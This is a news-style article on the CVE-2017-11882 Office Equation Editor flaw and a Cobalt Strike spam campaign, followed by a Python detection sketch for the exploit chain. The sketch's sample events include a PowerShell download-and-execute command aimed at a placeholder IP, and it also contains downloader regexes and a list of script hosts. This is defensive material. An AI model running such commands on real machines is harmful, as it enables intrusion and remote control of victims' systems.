A flaw in Microsoft Office has existed for 17 years but was only discovered and patched earlier this month. CVE-2017-11882 is a remote code execution vulnerability in the Equation Editor component of Microsoft Office, which Microsoft attributes to the way the software “handles certain objects in the memory.”
Attackers exploit the vulnerability to deliver backdoor malware that takes control of the infected system, giving them the ability to access files, execute commands, and more.
The campaign observed so far uses the so-called Cobalt malware, which is potent because it is built on Cobalt Strike, a legitimate penetration-testing tool used for adversary simulations whose payload communicates with its operator over covert channels. Although the vulnerability was only just disclosed, attackers have quickly weaponized it in the hope of spreading the malware before users install the security update. So far, only Russian speakers have been targeted, via a spam email purporting to come from Visa and notifying the recipient of a rule change to its payWave service.
The message contains a password-protected RTF document, together with the password needed to open it. The RTF file carries the exploit, and the password protection hides it from email scanners that cannot open an encrypted attachment. If the document is opened and the exploit fires, it launches a PowerShell script that downloads the Cobalt Strike payload and hands control of the victim’s system to the attackers. Users whose Office installation has this month’s security update applied are protected; those who are slow to install security patches remain at risk.
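For defenders, the chain described above has a simple telemetry signature. The following Python sketch is an added example, not code from the article or from any vendor: it runs a process-lineage check over constructed Sysmon-style process-creation records. It assumes, as is the case for CVE-2017-11882, that the exploit payload executes inside the Equation Editor process EQNEDT32.EXE, so that process becomes the parent of whatever the exploit launches (cmd.exe or powershell.exe in the campaign above). The log records, paths and URL are made up for the example.

```python
"""Detection sketch for the CVE-2017-11882 delivery chain (added example).

Flags process-creation events in which Equation Editor spawns a child
process, and PowerShell command lines with download-and-execute traits.
"""
import re
from pathlib import PureWindowsPath

# Equation Editor is where the CVE-2017-11882 payload runs, so it is the
# parent of whatever the exploit launches (assumption stated in the lead-in).
EQUATION_EDITOR = "eqnedt32.exe"

# Script hosts and living-off-the-land binaries an equation renderer has no reason to start
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}

# Command-line traits typical of a PowerShell download-and-execute stage
PS_DOWNLOADER = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|frombase64string"
    r"|-enc(odedcommand)?\b|-nop\b|-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)

# Constructed Sysmon Event ID 1 (process creation) records; not real telemetry.
SAMPLE_EVENTS = [
    {   # the chain from the article: Equation Editor -> cmd -> PowerShell downloader
        "ParentImage": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/x')",
    },
    {   # benign: Word opens Equation Editor to render a legitimate equation
        "ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE",
        "Image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
        "CommandLine": r'"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding',
    },
    {   # benign: an administrator runs a maintenance script from Explorer
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # Equation Editor launching PowerShell directly with an encoded command
        "ParentImage": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    },
]


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def classify(event: dict) -> list[str]:
    """Return the reasons this process-creation event looks like the exploit chain."""
    parent, child = _basename(event["ParentImage"]), _basename(event["Image"])
    cmdline = event.get("CommandLine", "")
    findings = []
    if parent == EQUATION_EDITOR:
        # Equation Editor only renders OLE objects; any child process is abnormal.
        findings.append(f"Equation Editor spawned {child}")
        if child in SCRIPT_HOSTS:
            findings.append(f"{child} is a script host / LOLBin")
    if "powershell" in cmdline.lower():
        hit = PS_DOWNLOADER.search(cmdline)
        if hit:
            findings.append(f"downloader-style PowerShell switch: {hit.group(0)}")
    return findings


def severity(findings: list[str]) -> str:
    """Lineage from Equation Editor alone is near-certain exploitation."""
    if any(f.startswith("Equation Editor spawned") for f in findings):
        return "high"
    return "medium" if findings else "none"


def scan(events: list[dict]) -> dict[int, str]:
    """Map event index -> severity for every event that produced findings."""
    return {i: severity(f) for i, e in enumerate(events) if (f := classify(e))}


if __name__ == "__main__":
    for i, sev in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: {sev}")
        for reason in classify(SAMPLE_EVENTS[i]):
            print("   -", reason)
```

Only the two events whose parent is EQNEDT32.EXE are rated high; Word legitimately starting Equation Editor, and an administrator's ordinary PowerShell script, produce no findings. Feeding real Sysmon or EDR process-creation events into `classify` only requires mapping the parent image, image and command line fields.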